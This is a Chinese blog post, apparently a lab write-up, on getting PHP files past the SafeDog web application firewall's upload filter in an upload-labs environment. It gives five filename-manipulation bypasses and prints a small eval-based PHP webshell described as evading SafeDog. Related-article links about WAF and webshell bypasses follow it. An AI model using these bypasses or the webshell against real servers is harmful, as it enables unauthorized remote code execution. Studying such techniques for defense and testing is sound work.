文件上传-绕过安全狗

最新推荐文章于 2024-07-09 15:48:59 发布
最新推荐文章于 2024-07-09 15:48:59 发布
阅读量1.4k 收藏 8
点赞数 1
分类专栏: 靶场 漏洞 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44769042/article/details/119742482
版权

1,3,4方法比较稳健

目录

1.用单双引号防匹配绕过

        此版本安全狗免杀

 2.filename="abc.jpg;.php"

3. filename==="xxx.php"

4.filename=;filename="xxx.php"

5.换行绕过

实验环境

安全狗+phpstudy+upload-labs-master

安全狗开启后,会有一个后缀名上传黑名单

先上传一个图片马,抓包查看

若是正常后缀名,可以上传

换成.php ,就会上传失败

设法绕过(这里是以第二关为例,,过其他关时还要考虑那一关的代码绕过)

1.用单双引号防匹配绕过

将文件名写成 filename="php    (去掉右侧引号,上传成功)

 换成单引号也行(不加引号也可以)

 上传成功,但是普通的木马文件会被扫出来

此版本安全狗免杀

<?php
define("hi","$_REQUEST[pass]");
eval(hi);
?>

上传后连接

 2.filename="abc.jpg;.php"

可以绕过上传,保存为 abc.jpg;.php

会以php文件执行

安全狗匹配时,会以 分号 为结束,后面的 .php 不会被匹配拉黑

这个方法不稳,有时候会被狗拦截

3. filename==="xxx.php"

要三个以上等号,,可以绕过

 

4.filename=;filename="xxx.php"

多个filename,,安全狗识别时会识别第一个,但是保存时会保存最后一个

5.换行绕过

将代码改为

filename="xxx.p

h

p"

换几次行都行,,因为安全狗匹配时

会将文件名识别为  xxx.p\nh\np

只要将不是 .php 就行

上传保存时会自动取消 \n ,保存为 xxx.php

新版本的安全狗会拦

木剑温小二丶
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
安全狗上传绕过+wbehshell免杀
09-05
服务器安全狗是一款集服务器安全防护和安全管理为一体的综合性服务器工具。支持Windows全系列操作系统(Windows2003/Windows2008/Windows2012 32位 64位)、Linux操作系统的服务器安全防护软件,从驱动层直接屏蔽攻击,保护服务器安全。自2011年推向市场后,迅速在服务器安全市场里占有一席之地。 这篇文档总结了一些安全狗上传绕过经验,供参考。
绕过安全狗继续注入的思路
08-30
标题: “绕过安全狗继续注入的思路” 描述: 介绍了通过特定方法绕过安全防护软件“安全狗”的方法来实现SQL注入。 标签: “安全”, “安全狗”, “SQL注入”, “渗透”, “绕过” 知识点: 1. 安全狗是针对网站...
文件上传绕过安全狗的一些方法
sGanYu
04-28 3835
目录 安全狗的安装 垃圾数据绕过: 数据包溢出绕过: 值匹配""的内容,后跟.php: 多个filename,绕过匹配: 白名单绕过: 测试工具:Burpsuite,安全狗 测试网站: 在没有安全狗的情况下,上传1.Php,以文件大小写后缀上传,是不会被拦截的,如下图 安全狗的安装 安全狗地址:网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改,选择windows操作系统,Apache版本选择4.0,一直默认安装即可 在默认安装时,会跳出需要填写关于Ap
什么,有狗快跑!慢着,这次手把手教你怎么过安全狗!(sql注入篇)
最新发布
wananxuexihu的博客
07-09 985
在记忆里上次绕安全狗还是在上次,开开心心把自己之前绕过狗的payload拿出来,发现全部被拦截了,事情一下子就严肃起来了,这就开整。
文件上传绕过安全狗
m0_50211409的博客
05-10 545
1,上传php一句话木马,提示不能上传php类型文件,只能上传 jpg.png.gif 通过弹框页面判断出是使用,前端代码进行验证的。 2,将前端代码删除,让他不能对上传类型进行验证。 发现删除后并不能进行一个绕过。 3,判断后端大概进行了后端验证将,php的一些文件进行了过滤。这时可以使用Apache的配置文件.htaccess进行绕过 我们上传一个自行编辑的名字为.htaccess文件。将Apache的htaccess进覆盖。 SetHandler application/x-httpd-php
web安全-数据包参数内容简介-文件上传WAF(安全狗)绕过方法
ran的博客
02-03 1265
由编成的知识可以知道一个语句结束的末尾需要添加分号,而参数filename的后面没有分号,由此可知这一整条语句可能到filename就截止了,由此可以猜想如果filename后面加一个分号以后,其后面就可能还可以添加其它内容。因为安全狗的匹配机制是匹配双引号里的内容,但是这里的双引号有前没有后,它就一直在找后面的那个双引号,但是没有找到,所以可能没有匹配到。有的参数值加了双引号,有的参数值没加双引号,由此可以想到加了双引号的就是可以随便修改的,而没加双引号的可能就是有着固定的一些参数值。
文件上传安全狗waf绕过思想
m0_48907714的博客
04-09 2479
本内容只做思想,因为这些已经是以前的了 上传参数名解析:明确有哪些东西能修改? Content-Disposition: 一般可更改 name: 表单参数值,不能更改 filename :文件名,可以更改 Content-Type:文件MIME,视情况更改 常见的绕过方法 数据溢出-防匹配(xxx… .) 符号变异-防匹配('和"和;) 数据截断-防匹配(%00 ;换行) 重复数据-防匹配(参数多次)x FUZZ大法 数据溢出-防匹配 符号变异-防匹配('和"和;) 去掉双引号 删除后面的" 切换成’
绕过安全狗asp代码
06-10
安全狗asp程序 突破安全狗的拦截 绕过安全狗 本程序是在文件管理器的基础上开发的 仅供研究使用
33.三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗(六)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。写文章-CSDN
2016最新php免杀webshell过安全狗
03-05
这个文件可能是经过特殊处理的,比如包含了免杀技巧,使得它能够绕过安全狗的检测。 综上所述,这个压缩包提供的知识点主要集中在PHP免杀Webshell技术和如何绕过Web应用防火墙,尤其是针对2016年环境的安全策略。这...
实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全狗写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
FCK上传绕过安全狗一则经验谈
12-13
FCK上传绕过安全狗一则经验谈
文件上传绕过安全狗
m0_64904947的博客
07-22 258
而且修改文件类型仅仅只是做到了落地免杀,没有做动态免杀,在用蚁剑连接木马的时候还是需要访问php文件还是需要读到内存里,一旦读取还是会被安全狗拦截,所以需要给蚁剑装一个编码器,因为普通的编码可能还是会被安全狗识别拦截,这里去github上下载一个。接下来尝试抓包修改文件类型,看看能不能上传上去,修改文件类型后上传成功,将info.php改为png。在选择编码器的时候要选择自己刚刚添加的自定义的编码器名字,我这里定义的是a。打开编码器的源码 ,里面自带了一个 免杀的木马,等下使用这个木马进行上传。
安全狗文件绕过
weixin_30241919的博客
08-24 469
上传绕过WAF的一些常用方法 0X01姿势总结 (1)fuzz文件名后缀方法用burpsuite进行模糊测试,寻找黑名单之外的文件(2)windows系统可以进行后缀修改如:webshell.php……………..(3)路径绕过:有些WAF只会监视某个目录是否被上传webshell(4)大小写组合如:PhPpHp(5)filename换行(6)多个filename(7)引号绕过如:双...
00截断上传绕过_绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)...
weixin_39663970的博客
12-20 252
思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。废话不多说,切入正题。。。。1、实验环境:Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.120482、用于文件上传PHP源码:...
mysql特性绕过安全狗_两种绕过安全狗等上传可执行文件的方式
weixin_42498346的博客
02-28 210
在获取到webshell时,往往需要上传exe类型的可执行exp进行提权,但是如果对方装有安全狗等,通过webshell上传是会被拦截的,所以,可以试试以下方法:一、打包为压缩文件上传解压这种方法需要可以执行系统命令,话说回来,如果不能执行系统命令,上传提权exp意义也不大windows系统自带zip,可以通过在本地压缩,webshell里解压释放exp,具体命令如下:压缩文件:makecab c...
最新版安全狗(v4.0.2.665) 文件上传 绕过
qq_41891666的博客
06-20 2078
0x00 前言: 继续上次 bypass 安全狗,这次测试的是 bypass 最新版安全狗来上传 php 一句话 0x01 实验环境: win7 sp1 + phpstudy v8.1(apache 2.4) + 安全狗v4.0.2.665 服务端脚本: <?php use function \move_uploaded_file as test; if (file_exists("upload/" . $_FILES["file"]["name"])) { echo $_FI
文件上传绕过安全狗V3.5---绕过WAF---uploadlabs
z2560088的博客
01-16 2307
目录 环境: 测试: 1.数据溢出-防匹配 参数;saldmsakdsaxxsadsa(垃圾数据);参数 2.符号变异-防匹配 1 "Getzwt.php:"文件名后加: 2 filename========"Getzwt.php"​ 3.破坏数据包的完整性 1 去除formdata 2 去除content-type参数 4 重复数据-防匹配 1 filename=;filename="Getzwt.php" 参数之间以;分隔,让waf认为filename=null从而绕...
文件上传之,waf绕过(24)
san3144393495的博客
05-20 1518
前期upload第二关的时候,判断的方式就是mime的类型的绕过绕过miem是图片类型就可以上传,没有验证后缀,这是代码的判断,我们在来探针一下防护软件是怎么判断的,现在第二关上传一个图片上去,抓住数据包,mime满足就可以上传,所以把上传的文件名字改成php格式,本来这是可以正常上传成功的。mime可以作为一个验证条件,验证mime来判断你个文件一个合法性的时候,可以通过更改mime来达到一个伪造,比如上传一个php文件,这时候可以更改为图片类来尝试绕过mime验证。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值